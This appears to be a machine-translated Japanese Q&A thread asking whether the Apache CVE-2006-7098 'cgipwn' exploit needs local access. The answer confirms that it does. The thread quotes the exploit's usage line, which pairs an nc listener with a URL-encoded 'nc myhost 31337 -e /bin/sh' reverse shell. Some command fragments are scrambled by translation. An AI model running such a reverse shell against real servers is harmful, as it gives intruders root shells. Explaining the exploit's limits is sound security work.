私はApache 1.3.34以前の脆弱性の解決に取り組んでいます。そして、CVE 2006-7098の脆弱性がどのような状況で悪用される可能性があるのかわかりません。これ閲覧ファイルエクスプロイトには以下が含まれます。
ローカル攻撃者はApacheに影響を与え、Apacheプロセスを開始したユーザー(通常はroot)が所有するパブリックttyにコマンドを渡すことができます。これにより、任意のコマンドが実行される可能性があります。注:CGI実行権限が必要であり、rootとしてシェルを介して手動でサービスを開始する必要があります。
使用法:CNC-vvv-lp 31337 http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
当初、私は脆弱なサーバーと同じネットワーク上の他のコンピュータで脆弱性を悪用する可能性があることを知りました。だから他のマシン(攻撃者)から私は:
- cgipwnエクスプロイトをコンパイルし、攻撃者マシンのApacheのcgi-binにインストールします。
- 攻撃者のマシンでncコマンドを実行し、-pを攻撃者のApacheがリッスンするポートとして指定します。ネットワークサーバー攻撃者システムのIPで私のホスト脆弱なサーバーとして。
しかし、私は成功しませんでした。コマンドは何も返しません。
それで、エクスプロイト情報を何度も読んでみると、この文に疑問点が生じました。ローカル攻撃者:これは、脆弱なApacheを実行しているのと同じコンピュータでのみ脆弱性が悪用される可能性があるという意味ですか?この場合、私は攻撃者が最初にApacheを管理する権限を持つシステムで有効なユーザーの資格情報を持っている必要があることを理解しています(これは攻撃の適用可能性を大幅に減らします)。
誰でもこれを説明できますか?
答え1
したがって、エクスプロイト情報を何度も読み直した後、「ローカル攻撃者」という用語について少し疑問が生じました。これは、脆弱なApacheを実行しているのと同じコンピュータでのみ脆弱性をエクスプロイトできることを意味しますか?この場合、私は攻撃者が最初にApacheを管理する権限を持つシステムで有効なユーザーの資格情報を持っている必要があることを理解しています(これは攻撃の適用可能性を大幅に減らします)。
あなたは正しいです。実際には、webserver
この脆弱性があるターゲットサーバー、myhost
つまり攻撃者のマシンです。
攻撃者はcgipwn
バイナリファイルをディレクトリに配置webserver
し、それを/cgi-bin
開いて(通常)Apacheを起動したユーザーとしてタスクを実行しようとします。http://webserver/cgi-bin/cgipwn?...
nc myhost 31337 /bin/sh
webserver
root
攻撃者は以前に接続を受け入れるnc -vvv -l -p 31337
ように実行しました。すべてが順調に進むと、攻撃者はApacheを起動したユーザーとして実行されている対話型セッションにアクセスできます。myhost
nc
webserver
/bin/sh
webserver